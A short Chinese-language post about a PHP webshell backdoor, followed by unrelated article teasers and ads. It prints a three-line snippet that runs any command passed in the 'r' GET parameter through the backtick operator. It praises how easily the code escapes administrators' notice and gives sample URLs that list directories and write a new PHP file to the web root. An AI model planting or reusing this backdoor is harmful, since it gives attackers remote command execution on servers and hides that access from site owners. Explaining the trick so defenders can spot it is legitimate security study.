偶然间看到一段,看起来似乎没有什么问题,确是能致命的后门代码,这里用到了一个一般的PHPer都不怎么关注的反撇号 ` ,反撇号包含的字符串,等同于shell_exec函数。
伪装性很好,很容易被管理员忽略。
$selfNums = $_GET['r'];
if (isset($selfNums)){
echo `$selfNums`;
}
刚看到这段代码我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了,
而且又不是单引号,这个就是关键所在了,这个符号是 Esc 下面的一个键(位于感叹号!旁边的),
通过 echo `系统命令`; 可以达到 system(); 一样的效果
如果不信的朋友可以测试
http://127.0.0.1/t.php?r=dir 可以列出目录
http://127.0.0.1/t.php?r=echo 我是马儿 >>D:\web\90sec.php
我用 appserv 和虚拟主机已经测试成功。
一般在做网站系统的时候,出于优化等因素的考虑需要再添加文章的时候删除掉不是本站的链接,对于这一要求可以通过让PHP处理下文章内容,来达到文章外部链接的自动删除的效果。 本实例代码主要参考...
看PHP的代码,总有些行前边有@符号,一直不知道是什么意思。 例如dede5.7 @ni=imagecreatetruecolor(ftoW,$ftoH); 今天用到了,就记一下吧。其实...
在PHP开发中对比起Cookie,session 是存储在服务器端的会话,相对安全,并且不像 Cookie 那样有存储长度限制。下面则是对Session的介绍。 php中的Session...
本文实例分析了php中HTTP_REFERER函数用法。分享给大家供大家参考。具体分析如下: 利用php的http_referer函数来判断用户的来路,这是比较简单的,实例代码如下: 复...
最近研究了下大文件上传的方法,找到了webuploader js 插件进行大文件上传,大家也可以参考这篇文章进行学习:《Web Uploader文件上传插件使用详解》 使用 ...
淘宝直播号 + 可直接开播
视频代下载
微信扫码询价